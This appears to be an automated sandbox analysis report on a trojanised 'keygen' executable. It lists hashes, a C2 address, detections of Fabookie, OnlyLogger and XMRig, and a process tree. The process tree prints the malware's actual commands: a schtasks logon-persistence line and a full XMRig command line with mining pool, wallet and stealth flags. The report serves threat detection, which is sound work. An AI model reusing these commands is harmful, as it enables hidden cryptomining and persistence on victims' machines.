Overview
overview
10Static
static
10keygen-step-1.exe
windows7-x64
10keygen-step-1.exe
windows10-2004-x64
10keygen-step-3.exe
windows7-x64
7keygen-step-3.exe
windows10-2004-x64
7keygen-ste...ck.exe
windows7-x64
3keygen-ste...ck.exe
windows10-2004-x64
7keygen-ste...28.exe
windows7-x64
10keygen-ste...28.exe
windows10-2004-x64
10keygen-ste...up.exe
windows7-x64
6keygen-ste...up.exe
windows10-2004-x64
6keygen-ste...5f.exe
windows7-x64
10keygen-ste...5f.exe
windows10-2004-x64
10keygen-ste...af.exe
windows7-x64
10keygen-ste...af.exe
windows10-2004-x64
10keygen-step-4/ss.exe
windows7-x64
1keygen-step-4/ss.exe
windows10-2004-x64
1keygen-step-6.exe
windows7-x64
7keygen-step-6.exe
windows10-2004-x64
7keygen.bat
windows7-x64
10keygen.bat
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-11-2024 13:01
Behavioral task
behavioral1
Sample
keygen-step-1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
keygen-step-1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
keygen-step-3.exe
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
keygen-step-3.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
keygen-step-4/Crack.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
keygen-step-4/Crack.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
keygen-step-4/PBrowFile28.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
keygen-step-4/PBrowFile28.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
keygen-step-4/Setup.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
keygen-step-4/Setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
keygen-step-4/f2217e5f.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
keygen-step-4/f2217e5f.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
keygen-step-4/md1_1eaf.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
keygen-step-4/md1_1eaf.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
keygen-step-4/ss.exe
Resource
win7-20240729-en
Behavioral task
behavioral16
Sample
keygen-step-4/ss.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
keygen-step-6.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
keygen-step-6.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
keygen.bat
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
keygen.bat
Resource
win10v2004-20241007-en
General
-
Target
keygen-step-4/PBrowFile28.exe
-
Size
1.8MB
-
MD5
8902f8193024fa4187ca1aad97675960
-
SHA1
37a4840c9657205544790c437698b54ca33bfd9d
-
SHA256
95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
-
SHA512
c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938
-
SSDEEP
49152:kqq2BEim5e9JoNLPxZVwNKaLsJi2lZZ6:xYOoNLJk1Yf
Malware Config
Extracted
gcleaner
194.145.227.161
Signatures
-
Detect Fabookie payload 1 IoCs
resource yara_rule behavioral8/files/0x0008000000023c6e-53.dat family_fabookie -
Fabookie family
-
Gcleaner family
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Onlylogger family
-
Xmrig family
-
OnlyLogger payload 1 IoCs
resource yara_rule behavioral8/memory/2264-62-0x0000000000400000-0x0000000002B59000-memory.dmp family_onlylogger -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral8/memory/5048-98-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral8/memory/5048-100-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral8/memory/5048-104-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral8/memory/5048-105-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral8/memory/5048-103-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral8/memory/5048-102-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral8/memory/5048-106-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral8/memory/5048-107-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral8/memory/5048-109-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral8/memory/5048-110-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral8/memory/5048-116-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation PBrowFile28.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation chrome3.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation services64.exe -
Executes dropped EXE 7 IoCs
pid Process 4068 chrome3.exe 1696 PublicDwlBrowser188.exe 3412 2.exe 2264 setup.exe 2396 jhuuee.exe 4940 services64.exe 3696 sihost64.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 81 raw.githubusercontent.com 87 pastebin.com 89 pastebin.com 80 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4940 set thread context of 5048 4940 services64.exe 124 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 4548 2264 WerFault.exe 89 3076 2264 WerFault.exe 89 3732 2264 WerFault.exe 89 3336 2264 WerFault.exe 89 3056 2264 WerFault.exe 89 4844 2264 WerFault.exe 89 4220 2264 WerFault.exe 89 2928 2264 WerFault.exe 89 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PBrowFile28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 944 schtasks.exe 4524 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 58 IoCs
pid Process 4068 chrome3.exe 4940 services64.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe 5048 explorer.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3412 2.exe Token: SeDebugPrivilege 1696 PublicDwlBrowser188.exe Token: SeDebugPrivilege 4068 chrome3.exe Token: SeDebugPrivilege 4940 services64.exe Token: SeLockMemoryPrivilege 5048 explorer.exe Token: SeLockMemoryPrivilege 5048 explorer.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 1016 wrote to memory of 4068 1016 PBrowFile28.exe 86 PID 1016 wrote to memory of 4068 1016 PBrowFile28.exe 86 PID 1016 wrote to memory of 1696 1016 PBrowFile28.exe 87 PID 1016 wrote to memory of 1696 1016 PBrowFile28.exe 87 PID 1016 wrote to memory of 3412 1016 PBrowFile28.exe 88 PID 1016 wrote to memory of 3412 1016 PBrowFile28.exe 88 PID 1016 wrote to memory of 2264 1016 PBrowFile28.exe 89 PID 1016 wrote to memory of 2264 1016 PBrowFile28.exe 89 PID 1016 wrote to memory of 2264 1016 PBrowFile28.exe 89 PID 1016 wrote to memory of 2396 1016 PBrowFile28.exe 90 PID 1016 wrote to memory of 2396 1016 PBrowFile28.exe 90 PID 4068 wrote to memory of 816 4068 chrome3.exe 116 PID 4068 wrote to memory of 816 4068 chrome3.exe 116 PID 816 wrote to memory of 944 816 cmd.exe 118 PID 816 wrote to memory of 944 816 cmd.exe 118 PID 4068 wrote to memory of 4940 4068 chrome3.exe 119 PID 4068 wrote to memory of 4940 4068 chrome3.exe 119 PID 4940 wrote to memory of 220 4940 services64.exe 120 PID 4940 wrote to memory of 220 4940 services64.exe 120 PID 4940 wrote to memory of 3696 4940 services64.exe 122 PID 4940 wrote to memory of 3696 4940 services64.exe 122 PID 220 wrote to memory of 4524 220 cmd.exe 123 PID 220 wrote to memory of 4524 220 cmd.exe 123 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 PID 4940 wrote to memory of 5048 4940 services64.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:944
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4524
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
- Executes dropped EXE
PID:3696
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2264 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 7883⤵
- Program crash
PID:4548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 8243⤵
- Program crash
PID:3076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 8003⤵
- Program crash
PID:3732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 9443⤵
- Program crash
PID:3336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 9603⤵
- Program crash
PID:3056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 11323⤵
- Program crash
PID:4844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 11403⤵
- Program crash
PID:4220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 12083⤵
- Program crash
PID:2928
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"2⤵
- Executes dropped EXE
PID:2396
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2264 -ip 22641⤵PID:2812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2264 -ip 22641⤵PID:4832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2264 -ip 22641⤵PID:1960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2264 -ip 22641⤵PID:2240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2264 -ip 22641⤵PID:908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2264 -ip 22641⤵PID:3480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2264 -ip 22641⤵PID:3280
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2264 -ip 22641⤵PID:2436
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5a5bace3c3c2fa1cb766775746a046594
SHA19998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA51266f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184
-
Filesize
101KB
MD513e802bd360e44591d7d23036ce1fd33
SHA1091a58503734848a4716382862526859299ef345
SHA256e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA5128bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b
-
Filesize
43KB
MD54b0d49f7c8712d7a0d44306309f2e962
SHA15f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA51250dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b
-
Filesize
1.3MB
MD5f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1eba6ac68efa579c97da96494cde7ce063579d168
SHA2565f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA5128806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171
-
Filesize
314KB
MD50ebb4afbb726f3ca17896a0274b78290
SHA1b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA2562fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11
-
Filesize
7KB
MD59910203407b2605107587e954081c575
SHA18037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA25607b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be